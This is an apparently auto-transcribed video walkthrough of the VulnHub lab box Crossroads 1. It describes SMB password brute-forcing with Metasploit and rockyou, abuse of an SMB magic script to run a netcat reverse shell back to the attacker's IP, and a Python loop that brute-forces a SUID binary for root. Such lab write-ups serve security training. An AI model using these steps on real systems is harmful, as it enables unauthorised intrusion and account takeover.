Yo, what's going on, guys? In this video, we're going to be doing Crossroads 1 from VulnHub. I rate this box about a solid easy, and yeah, hope you guys enjoy. Alright, so to get started, I'm actually going to open my terminals here. Let me just split these. So I'm going to do a netdiscover minus r 10.0.0.1 for my gateway. We'll do minus 24, or minus I slash our interface. We do get an IP address of 10.0.0.102. So I'm going to run an mmap scan SC. We'll do minus SV. And we can press enter on that, scan all ports. I'm going to do a simple banner grab on the machine. Also on port 80. So you do know that HTTP is open. Looking at this, it does seem like we just have a website here. I'm going to do control U to read the source code. So look at this website. I'm going to run a go buster on here. So I'm going to do go buster dir mode for the type of mode minus U HTTP. We'll do minus W for the word list user share. We're going to use word list or buster with directory. We'll do HTML, TXT, and also we'll do PHP. So we do have robots.txt, and we also have node.txt. So let's try to visit our robots.txt. We do get an entry here, which just seems like it's a PNG. Nothing's here. So so let's visit our node.txt. We do have this little message here. We can do control U. It doesn't seem like anything is there. So under here we just have no and robots.txt, which was a PNG file in there, right? So look at this. We do have a port 80 for open HTTP. We have 139 and 445 for SMB. So there's actually two ways to do this to check for the shares. So we can do SMB map. We can do minus H, I believe. You can do minus H 10.0.0.102. This is going to get us the shares, right? So we have no access on this. So next thing I'll do is actually, let's go under my, we'll go under try hack me, and we'll go to crossing. Or is it not try hack me? VulnHub actually. CD into crossing, or Crossroads. Here I do have a brew.py for the previsk, but that's going to be for later on. So I'm going to run an enum for Linux. I'll do this, I'll do minus A for all enumeration on 10.0.0.102. We'll output this to a scan.out. So we can let that run. So you could use SMB map, or you can use the crack map exec. I believe you can specify SMB 10.0.0.102. We can do minus shares, I believe. And then I think that would be it. We can press enter on that. Unless we can specify no authentication. So just give us the name as Crossroads, the domain sign, the signing, and also the SMB version. So let's more into SMB, or is it more.scan.out. So look at this, I'm going to open a text editor. So looking at this, we do get a local user as nobody. So we can just type in, we'll just say user names. Scrolling down, we do get another user as Albert. Let's put that in there. We just get local groups, and seems about it. So we do have user Albert, and also we have user Albert and nobody. So since we do have that, let's check if we can do some null authentication. So we can do SMB, let's do SMB client minus, let's do minus L so we can list the shares. We'll do 10.0.0, it's 102, right? 102, we can do minus, I think we can list the U, I think it's lowercase u. And we can do minus P. Let's see. This was, let's see, this is uppercase U and uppercase P actually. So it is asking us for a password. So we can do SMB client to list the shares, but the next thing we can do to actually find the password for Albert, you could use crackmap.exec. So you can use crackmap.exec if you did ever want to use it, which I actually think is pretty bad tool because it gives you false positives sometimes. But if you did want to do that, you can do crackmap.exec. The protocol for SMB 10.0.0.102 for the IP address. You can use minus U. You can specify the user, and you can also use a user share wordless rocku.txt for the path. And you can start brute forcing that way, right? The way I do is actually go on Google and search up MSF console. We can do MSF console for brute force SMB. So let's load up MSF console right here. We can use this auxiliary module here. So we can just copy this and use this if it works. So the first thing we can do is set the auxiliary module. We can set the rhost. So we can set the rhost as 10.0.0.102. We can set the pass, I think it's pass underscore file as a user share word list rocku.txt. And we can set the SMB user as Albert. So we can run this. This should start brute forcing for under user Albert using rocku.txt. Once we do have the password, we could use the shares. I believe we can do minus shares for user Albert and specify a password. We can try. Let's press enter on this. See for null authentication. It doesn't seem to work because it keeps giving me this error, but if you ever did want to use it, you can specify the username and also the password. Alright, so after some time waiting, we do get a valid credential as Albert at Bradley1. So we can just copy this and put this into under put this into passwords, and we can press enter on that. We do have Bradley1, so we can check if this is correct. Like I said before, crackmap.exec gives false positives, so pressing enter on this does show that this is incorrect. It's not a valid credential, right? So we could use SMB client for this. So let me clear this. We can use SMB map. We can specify the host, right? 10.0.0.102. We'll do minus u. I believe it's lowercase u. We can specify Albert and also minus p and the password, so we know it's Bradley1. Look at this. We do get a we get print SMB share IPC and Albert. We do see this as read only, read and write. We can't access that. We can do read only, right? So let's connect to this. Let's do SMB client. We'll do minus we'll do /10 things 10.0.0.102.102. We can do SMB. Let's go into Albert first, and we can do minus u Albert Bradley1. We do have broot user.txt. So let's go under my VulnHub, it's going to Crossroads. So we can get our user .txt. We can also get seems about it. We don't really need the crossroads.png. Actually, we could get this. Let's just get the crossroads.png because we're going to need this for the previsk. So let's look back at the shares again. Let's do Bradley 1, or not. Let's use SMB map. Let's go into SMB share. So let's copy this. We do have a smb.config, which could contain magic scripts. If you don't know what magic scripts is, it just lets you execute a script as the user. So let's get our smb.config. Let's X out of this. And now we do have our crossroads png, smb.config, and user.txt, right? So we could cat our user.txt, which seems like this is the first flag here that we have. Let's vi into smb.config. So scroll down and see if we can go under the user Albert, which should be located down here. Or we have SMB share actually. It's for the share actually, and then we are under SMB share. So looking at this, just show we can use SMB script.sh to get a shell back. So let's quit this. Let's do SMB. It's actually touch smb share.sh. We can vi, or we'll just echo this. So we can echo a simple netcat -c. We'll call a we'll execute a bin /bash, and we can do 10.0.069 on 5555, and we'll echo out this to smb share.sh. So now we can use SMB client to connect again. So now we can put our, once we can use the put command. You can use get or put. Right now we're going to be using put since we want to put something on the SMB server. So we're going to put our SMB script, SMB script.sh. Since we already do have the password here, we can just exit out. Let's start a listener here to get a shell back. So we're going to use netcat -lmvp on file 5555. We can put our smb share.sh. Did we echo this right? Let me check if this is my right IP address. 69. Unless the file's not right. Let's scroll down and see what the script was. smb script.sh, right? Wait, did I name this right? I named this SMB share, that's why. So let's touch a smb script.sh. We'll echo this. We already have the echo command, so smb script.sh. So now we can go back to smb client, type in the password as Bradley1, we can ls, then we can put our smb share, right? Wait, what the? Oh, the SMB script, alright, I'm getting confused right now, so we can just do Bradley1. SMB script.sh, and now we do get a connection back. So we can export equals extern, hit this. Now let's spawn a tty shell. So we can copy and paste this right here. Let's spawn a bin bash. and also spawn this in Python 3. So now we're under home, Albert, and SMB share, right? So looking at this, let me actually get the B root. Let me see if this lets me exit home. Is this not going to let me exit out? There you go. So let's actually go under Albert so I can get the B root, so I can show you guys why. I'll explain right now. So we can get our B root. I'm looking at this. If we actually go under, if we do strings on B root, you will see that this is using SUID. So that means most likely this is going to lead us to the prevesc, and it's also using system. It is depending off a script under bin or under root broot.sh. So we don't have access to root anyways. So we know that that can't work. So now if we do try to run broot, you will see that it is using the clear command, which we can't really manipulate the path because it's using user bin clear, and if it's using a path, we can't manipulate the path, right? So here it is asking us for a password. So we're going to get our crossroads.png. We already have this under here. So here if we go to hack tricks and search up Stego, looking at this, we could go to Control F and do PNG. We can use Steg or Vitas, Steg Britas. I'm not sure how you pronounce that, but I believe I do have it under here. It's this, yeah, so you can use app to install this. I'm not sure. I think you can also use, you can git clone the repository and install it. So we do have this right here, right? So all to use this command is, if you're looking at here, you can do the command and specify the JPG file. This is a PNG file. I think it supports PNG and also a JPG, so we can use that file, right? So we're going to use that file and also use the file which is crossroads.png. So let me close this out. So we can let this extract all the data. So we can do ls-la. Looking at this, there is a new directory as results. We could use, or we could go under keepers. And doing ls-la, you will see that the first, if we cat this out, this leads to a word list, right? So we can cat this out to wordlist.txt. We can move, or we'll just copy a wordlist.txt to our Crossroads directory. And now we do have wordlist.txt, right? So we can actually create a script that actually brute forces the B root, right? So if we do echo and type in password, and we can pipe this out to B root, you will see that this is inputting the password to that, right? And it shows wrong password. So we're going to be using the same thing, using the subprocess.getOutput to run this command and run in a for loop, right? So look at this. We'll go to brew.py. This is a script I made. So we do import the subprocess OS time and sys. We're going to be using echo, so I specify the path. The content is what's being ran in right here, right? I also did specify blank because of the path. We want a space between the path and also and also the word, right? The executable is broot. So I made a function called broot. We do os.system, since it is, we do need to export the term, because it is clearing, right? When it's being ran in broot. We run a wordlist.txt. We read that. This is the type encoding it is. I did get an error while making the script, so this is the type encoding that it uses. Honestly, I'm really not sure, but this is what I got, right? Words.follow.read.split lines actually just splits each line, right? We execute a subprocess.getOutput with it's gonna execute echo, put a space there, and it's gonna put the word right here, which is basically this section right here, and also run our broot, right? Make sure it pipes this out into executable, which is specified as broot. We check if the content, which is the content right here, if this is not in there, that means we got a login successful. If it is, then of course we wouldn't get a password, right? So we can quit out of this. So let me do ls -la. I will start a Python server on here. http.server on we'll do 4444. So let me just wget this into the Albert home in Albert. So we will wget http 10.0.069. We'll do this for 4444. We're going to be getting wordlist.txt and also our broot.py. So broot.py. So now we do have broot.py and also wordlist.txt. Make sure you do specify the wordlist.txt, the same name as your txt file, right? So we'll do chmod, we'll do +x for broot.py. So now we do have wordlist.txt. So now we can do our Python 3 for broot.py. Looking at this, it is brute forcing now for the password. For some reason, if you do try this as the password, it just outputs this as the wrong password. Really not sure what causes that problem, but it still shows that this as the wrong password, right? So we'll do nano into wordlist. We'll do Control W, find this right here. We can delete this. We can delete that word now. So now we can just wget this new word list. So we can clear this. We can run our we'll do Python broot.py. Seems like there's a problem, so let's actually remove wordlist.txt. It doesn't seem like it overwrit the file. So let's run that one more time, that should work now. And we do get a password right here, so right here to show we can do ls and find root creds. So we can cat our root or root creds or just root creds actually, yeah. And we do get a password here, so we can just use switch users to root. Press enter, and we can go into root ls, and if we check our D, we are root. So we can cat our root.txt. And there is our flag 2 out of 2, right? And we are root. And there's our ID, right? Well, guys, that's pretty much in the video. Remember, drop that like and subscribe button. And I'll catch you guys in the next one. Peace.